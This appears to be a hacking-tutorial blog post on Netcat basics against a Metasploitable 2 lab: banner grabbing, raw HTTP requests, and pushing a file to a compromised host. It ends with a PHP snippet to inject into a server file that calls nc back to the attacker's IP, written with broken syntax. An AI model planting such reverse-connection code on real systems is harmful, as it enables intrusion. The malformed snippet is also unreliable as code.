Netcat is a great network utility for reading and writing to network connections using the TCP and UPD protocol. Netcat is often referred to as the Swiss army knife in networking tools and we will be using it a lot throughout the different tutorials on Hacking Tutorials. Most common use for Netcat when it comes to hacking is setting up reverse and bind shells, piping and redirecting network traffic, port listening, debugging programs and scripts and banner grabbing. In this tutorial we will be learning how to use the basic features from Netcat such as:
- Banner grabbing
- Webserver interaction
- File transfers
Banner Grabbing
Service banners are often used by system administrators for inventory taking of systems and services on the network. The service banners identify the running service and often the version number too. Banner grabbing is a technique to retrieve this information about a particular service on an open port and can be used during a penetration test for performing a vulnerability assessment. When using Netcat for banner grabbing you actually make a raw connection to the specified host on the specified port. When a banner is available, it is printed to the console. Let’s see how this works in practice.
The following command is used the grab a service banner (make a raw connection to a service):
- nc [ip address][port]
Let’s try this on the FTP service on Metasploitable 2 which is running on port 21:
- nc 192.168.100.100 21
Web server interaction
Netcat can also be used to interact with webservers by issuing HTTP requests. With the following command we can grab the banner of the web service running on Metasploitable 2:
- nc 192.168.100.108 80
And then run this HTTP request:
HEAD / HTTP/1.0
Apache webserver banner.
The webserver responds with the server banner: Apache/2.2.8 (Ubuntu) DAV/2 and the PHP version.
To retrieve the top level page on the webserver we can issue the following command:
- nc 192.168.100.108 80
And then run this HTTP request:
GET / HTTP/1.0
File transfers with Netcat
In this example we will be using a Netcat connection to transfer a text file. Let’s assume we have remote command execution on the target host and we want to transfer a file from the attack box to the host. First we would need to set up a listener on the target host and connect to it from the attack box. We will be using port 8080 for this purpose and we safe the file to the desktop:
- nc -lvp 8080 > /root/Desktop/transfer.txt
On the attack box we connect to port 8080 and send a file name transfer.txt:
- nc 192.168.100.107 8080 < /root/Desktop/transfer.txt
This Netcat reverse connection
It is used in system hacking and web server hacking and also inject in php processing file.
Example
- <?php
- system(nc 192.168.100.107 8080);
- ?>
it gives you back connection on port 8080.
After you can listen on your system by :
- nc -l -p 8080
No comments:
Post a Comment